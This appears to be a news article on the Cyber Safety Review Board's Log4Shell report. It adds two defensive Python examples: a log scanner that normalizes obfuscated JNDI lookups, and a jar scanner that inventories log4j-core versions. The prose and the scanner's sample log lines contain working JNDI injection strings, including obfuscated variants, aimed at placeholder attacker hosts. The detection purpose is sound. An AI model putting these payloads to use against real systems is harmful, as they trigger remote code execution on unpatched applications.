The Department of Homeland Security recently published a report describing what it calls an "endemic vulnerability" in a piece of software used by governments and businesses worldwide.
Although released by DHS, the report is the work of the Cyber Safety Review Board, a government forum established in February 2022 under the executive order on improving the nation's cybersecurity that President Joe Biden signed in May 2021. The board was created in response to the surge in cybercrime over the last few years, particularly ransomware. That class of malware has plagued consumers worldwide, threatened IT systems at hospitals and schools, and struck companies from the Colonial Pipeline Company to the Ferrara Candy Company.
"At this critical juncture in our nation's cybersecurity, when our ability to handle risk is not keeping pace with advances in the digital space, the Cyber Safety Review Board is a new and transformational institution that will advance our cyber resilience in unprecedented ways," said Secretary of Homeland Security Alejandro N. Mayorkas. "The CSRB's first-of-its-kind review has provided us - government and industry alike - with clear, actionable recommendations that DHS will help implement to strengthen our cyber resilience and advance the public-private partnership that is so vital to our collective security."
According to the CSRB's report, a number of ransomware incidents likely resulted from a critical vulnerability in Log4j, an open-source library maintained by the Apache Software Foundation. Log4j is a logging library for Java: applications that use it record their own events (requests handled, errors, diagnostic messages) to files, consoles or other destinations. Because almost every Java application needs logging, Log4j is embedded in an enormous range of commercial and in-house software, often several layers deep in other dependencies.
The flaw (named "Log4Shell" by LunaSec and tracked as CVE-2021-44228), which some experts have called the most severe software vulnerability to date, gives attackers what is known as "arbitrary code execution." Vulnerable versions of Log4j evaluated lookup expressions of the form ${...} inside the messages they logged. An attacker who could get a string such as ${jndi:ldap://attacker-host/x} into any logged field (a User-Agent header, a username, a chat message) could make the application contact a server the attacker controls through JNDI, fetch code from it and run that code, with no authentication required. In essence, the attacker's input is not merely recorded but interpreted.
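The report does not include code, so the following is an added example, not material from the CSRB or from the Log4j project. It shows the detection side of the mechanism described above: a scanner that normalizes the lookup syntax attackers used to hide the word "jndi" (the lower/upper lookups and the ${x:-default} form that Log4j evaluates) and then flags log lines carrying a JNDI lookup. The sample log lines, the IP addresses (documentation range) and the function names normalize, resolve_lookup and scan are all constructed for this illustration.

```python
import re

# Innermost ${...} (no nested ${ or } inside), resolved first, like Log4j does.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with its protocol and target host, checked after normalization.
JNDI = re.compile(r"\$\{\s*jndi:(?P<scheme>[a-z]+)://(?P<host>[^/\s}:]+)", re.IGNORECASE)

# Constructed access-log lines for the demonstration (not real traffic).
SAMPLE_LINES = [
    '10.0.0.7 - - "GET / HTTP/1.1" 200 ua="Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 ua="${jndi:ldap://203.0.113.5:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 ua="${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 ua="${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5:1099/x}"',
    '10.0.0.9 - - "GET /?q=${jndi:${lower:d}ns://203.0.113.5/x} HTTP/1.1" 404',
    '10.0.0.4 - - "GET /?x=${env:HOME} HTTP/1.1" 200',
]


def resolve_lookup(body):
    """Statically evaluate the subset of Log4j 2 lookups used to obfuscate 'jndi'.
    Returns the substituted text, or None for lookups we cannot evaluate
    offline (jndi:, env:, date:, ...)."""
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    # ${anything:-default} yields 'default' when the lookup produces nothing;
    # ${::-j} is the classic way to spell the letter j.
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text, max_rounds=64):
    """Collapse nested lookups until only unevaluable ones remain."""
    s = text
    for _ in range(max_rounds):  # bounded so hostile input cannot spin forever
        m = INNER.search(s)
        if m is None:
            break
        replacement = resolve_lookup(m.group(1))
        if replacement is None:
            # Keep the lookup but hide its delimiters so an enclosing lookup
            # can be processed in the next round; restored below.
            replacement = "\x01" + m.group(1) + "\x02"
        s = s[:m.start()] + replacement + s[m.end():]
    return s.replace("\x01", "${").replace("\x02", "}")


def scan(lines):
    """Return (line_index, scheme, host, normalized_line) for each hit."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append((i, m["scheme"].lower(), m["host"], norm))
    return hits


if __name__ == "__main__":
    for idx, scheme, host, norm in scan(SAMPLE_LINES):
        print(f"line {idx}: jndi via {scheme} to {host}")
        print(f"    normalized: {norm}")
```

This catches the obfuscations that were common in the wild, but it is a triage aid, not a control: Log4j supports further lookups (date, sys, ctx and others) that can be combined to evade string matching, and a request can be logged by a component you do not see. The reliable fix is the patched library, with the normalized indicators used to find hosts that were probed before the patch landed.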
While the CSRB has provided a lengthy list of recommendations and intends to work with industry experts to address weaknesses in U.S. cybersecurity, the board has warned that the vulnerability is already present in countless devices and that fully remediating it could take years. According to an analysis conducted by Ernst & Young and cloud security company Wiz, 93% of enterprise cloud environments were vulnerable to the flaw shortly after the Apache Software Foundation disclosed it in December 2021. The CSRB's report notes that "many organizations have still not fully patched vulnerable instances of Log4j."
The report outlined crucial weaknesses in how U.S. industry consumes open-source software, highlighting the heavy reliance on well-established open-source organizations such as the Apache Software Foundation. The report notes that, unlike conventional enterprises, the ASF and other open-source groups do not keep track of who uses their products, nor do they restrict who may download them, so there is no vendor list of affected customers to notify.
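The reason patching drags on is that Log4j is bundled inside other artifacts, so an organization first has to find every copy. As an added example (not code from the report or from the Log4j project), the following scanner walks a jar, war or ear and the archives nested inside it, reads the version each embedded log4j-core declares, and checks for the JndiLookup class whose removal was the official mitigation for old versions. The entry paths it looks at are the real ones in official log4j-core jars; the fixed-version windows follow the Apache Log4j advisories for CVE-2021-44228 and CVE-2021-45046 (2.16.0 and later, plus the 2.12.2+ and 2.3.1+ back-port lines). The sample archives are built in memory and contain only the entries needed for the demonstration, and the function names (scan_archive, is_fixed, build_sample_war and so on) are this example's own.

```python
import io
import re
import zipfile

# Entry paths inside an official log4j-core jar.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1). Pre-release tags such as '2.0-beta9' fall back to
    the base version, which keeps them on the vulnerable side of the check."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return (0, 0, 0)
    return tuple(int(x or 0) for x in m.groups())


def is_fixed(version):
    """Fix for CVE-2021-44228 and CVE-2021-45046 present: 2.16.0+, or the
    Java 7 line 2.12.2+ and the Java 6 line 2.3.1+. 2.15.0 is not enough."""
    v = parse_version(version)
    return (v >= (2, 16, 0)
            or (2, 12, 2) <= v < (2, 13, 0)
            or (2, 3, 1) <= v < (2, 4, 0))


def scan_archive(data, path, findings=None):
    """Record every log4j-core found in this archive or any nested archive.
    Returns a list of (path, declared_version, status)."""
    if findings is None:
        findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip container; nothing to inspect
    with zf:
        names = zf.namelist()
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_jndi = JNDI_CLASS in names
        if version is not None or has_jndi:
            if version is None:
                status = "review"       # JndiLookup present but no pom: shaded/relocated copy
            elif is_fixed(version):
                status = "fixed"        # fixed releases still ship JndiLookup, JNDI disabled
            elif has_jndi:
                status = "vulnerable"
            else:
                status = "mitigated"    # old version with JndiLookup.class deleted
            findings.append((path, version, status))
        for name in names:              # recurse into jars inside wars, ears, fat jars
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(zf.read(name), f"{path}!{name}", findings)
    return findings


def build_log4j_core(version, keep_jndi=True):
    """Constructed stand-in for a log4j-core jar: just the entries the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\n")
        zf.writestr("org/apache/logging/log4j/core/Core.class", b"\xca\xfe\xba\xbe")
        if keep_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_sample_war():
    """Constructed application archive bundling several log4j-core copies."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", build_log4j_core("2.14.1"))
        zf.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", build_log4j_core("2.15.0"))
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", build_log4j_core("2.17.1"))
        zf.writestr("WEB-INF/lib/legacy-2.12.2.jar", build_log4j_core("2.12.2"))
        zf.writestr("WEB-INF/lib/stripped-2.14.1.jar", build_log4j_core("2.14.1", keep_jndi=False))
    return buf.getvalue()


def statuses(archive, path="app.war"):
    """Map each discovered log4j-core path to its status."""
    return {p: s for p, _, s in scan_archive(archive, path)}


if __name__ == "__main__":
    for p, v, s in scan_archive(build_sample_war(), "app.war"):
        print(f"{s:10} {v or '?':8} {p}")
```

Two caveats a practitioner should keep in mind. A copy of Log4j that was shaded or repackaged by a vendor will not carry the pom.properties entry, which is why the scanner reports it for review rather than guessing; production inventory tools match class file hashes instead. And the "mitigated" state only addresses the JNDI lookup: it is a stopgap, and the report's point stands that the instance is not fully patched until the library itself is upgraded.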
"The Board also found specific challenges associated with maintaining open-source projects like Log4j, which generally rely on volunteer teams and do not necessarily have dedicated security resources throughout the Software Development Lifecycle," the CSRB notes in its report. "Open-source projects generally do not have dedicated coordinated vulnerability disclosure and response teams that investigate root causes of reported vulnerabilities and work to bring them to resolution."